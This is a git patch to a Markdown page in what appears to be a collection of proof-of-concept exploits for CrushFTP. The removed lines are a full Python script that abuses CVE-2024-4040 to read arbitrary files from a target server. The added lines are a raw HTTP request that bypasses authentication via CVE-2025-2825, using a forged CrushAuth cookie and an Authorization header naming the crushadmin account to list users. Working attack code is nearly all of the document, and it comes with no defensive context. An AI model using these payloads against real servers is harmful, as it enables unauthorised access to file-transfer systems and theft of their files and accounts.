From 59289c32d639560d19f8c83923e159de2e225f3c Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 31 Mar 2025 14:55:29 +0800
Subject: [PATCH] =?UTF-8?q?Update=20CrushFTP=E8=BA=AB=E4=BB=BD=E9=AA=8C?= =?UTF-8?q?=E8=AF=81=E7=BB=95=E8=BF=87(CVE-2025-2825).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../CrushFTP身份验证绕过(CVE-2025-2825).md | 63 +++----------------
 1 file changed, 8 insertions(+), 55 deletions(-)
diff --git a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
index 425dae0..59b67a4 100644
--- a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
+++ b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
@@ -1,60 +1,13 @@
-## CrushFTP服务器端模板注入(CVE-2024-4040)
+## CrushFTP身份验证绕过(CVE-2025-2825)
 
 ## poc
 
-```python
-import requests
-import argparse
+```javascript
+GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
+Host: target-server:8081
+Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
+Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
 
-HEADER = '\033[95m'
-OKBLUE = '\033[94m'
-OKCYAN = '\033[96m'
-OKGREEN = '\033[92m'
-WARNING = '\033[93m'
-FAIL = '\033[91m'
-ENDC = '\033[0m'
-BOLD = '\033[1m'
-UNDERLINE = '\033[4m'
-
-def get_cookies(url):
- try:
- session = requests.Session()
- response = session.get(url)
- if response.status_code != 200:
- raise Exception("Failed to connect to the server")
- session.cookies.get_dict()
- return session.cookies.get_dict()
- except Exception as e:
- print(FAIL + "Error: " + str(e) + ENDC)
- quit()
-
-def exploit(url, cookies, path):
- try:
- if not path.startswith("/") or not path.endswith("/"):
- raise Exception("Invalid path format. Path should start and end with '/'")
- url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=" + path + "&names=*"
- response = requests.get(url, cookies=cookies)
- if response.status_code != 200:
- raise Exception("Failed to connect to the server")
- return response.text
- except Exception as e:
- print(FAIL + "Error: " + str(e) + ENDC)
- quit()
-
-if __name__ == "__main__":
- parser = argparse.ArgumentParser()
- parser.add_argument("-u", "--url", help="URL of the target", required=True)
- parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
- args = parser.parse_args()
- url = args.url
- path = args.path
- if not url.startswith("http"):
- print(WARNING + "URL should start with 'http' or 'https'")
- quit()
- cookies = get_cookies(url)
- if 'currentAuth' not in cookies:
- print(WARNING + "Not vulnerable" + ENDC)
- quit()
- else:
- print(OKCYAN + exploit(url, cookies, path) + ENDC)
 ```
+
+![image](https://github.com/user-attachments/assets/6d6a18ba-3b8b-4c65-97c0-ad24cb59e1b2)